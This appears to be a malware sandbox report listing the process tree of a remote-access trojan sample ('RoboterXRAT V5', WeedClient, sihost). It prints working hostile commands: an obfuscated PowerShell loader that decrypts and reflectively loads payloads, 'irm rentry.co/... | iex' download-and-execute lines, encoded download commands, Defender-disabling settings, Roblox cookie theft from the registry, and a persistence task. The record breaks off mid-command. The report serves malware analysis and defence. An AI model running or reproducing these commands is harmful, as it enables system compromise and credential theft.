        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944
  - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
      "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4376
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:180
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3300
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5524
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        Checks computer location settings
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        Checks computer location settings
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        Checks computer location settings
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        18⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:732
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        16⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        15⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        Drops file in Drivers directory
        
        PID:2648
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:6084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:1448
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        Views/modifies file attributes
        
        PID:5704
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:4300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        16⤵
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:4872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:1744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:180
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        16⤵
        
        PID:4396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:5968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        16⤵
        
        PID:1564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:5188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:1332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        16⤵
        
        PID:64
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        16⤵
        Detects videocard installed
        
        PID:2364
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:6060
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        16⤵
        
        PID:5144
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:6080
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        17⤵
        Runs ping.exe
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        Executes dropped EXE
        
        PID:3740
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        Executes dropped EXE
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        Executes dropped EXE
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        Executes dropped EXE
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        Executes dropped EXE
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        Executes dropped EXE
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        Executes dropped EXE
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        Executes dropped EXE
        
        PID:6112
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4044
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        11⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        12⤵
        Blocklisted process makes network request
        
        PID:1592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        13⤵
        
        PID:4980
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        15⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        15⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        11⤵
        
        PID:5644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        Executes dropped EXE
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        9⤵
        Executes dropped EXE
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        9⤵
        Executes dropped EXE
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        9⤵
        
        PID:5588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        11⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5964
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        13⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        13⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        9⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5932
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC17.tmp.bat""
        9⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        10⤵
        Delays execution with timeout.exe
        
        PID:5972
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        10⤵
        Executes dropped EXE
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        8⤵
        Executes dropped EXE
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:380
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        8⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        9⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:3360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAA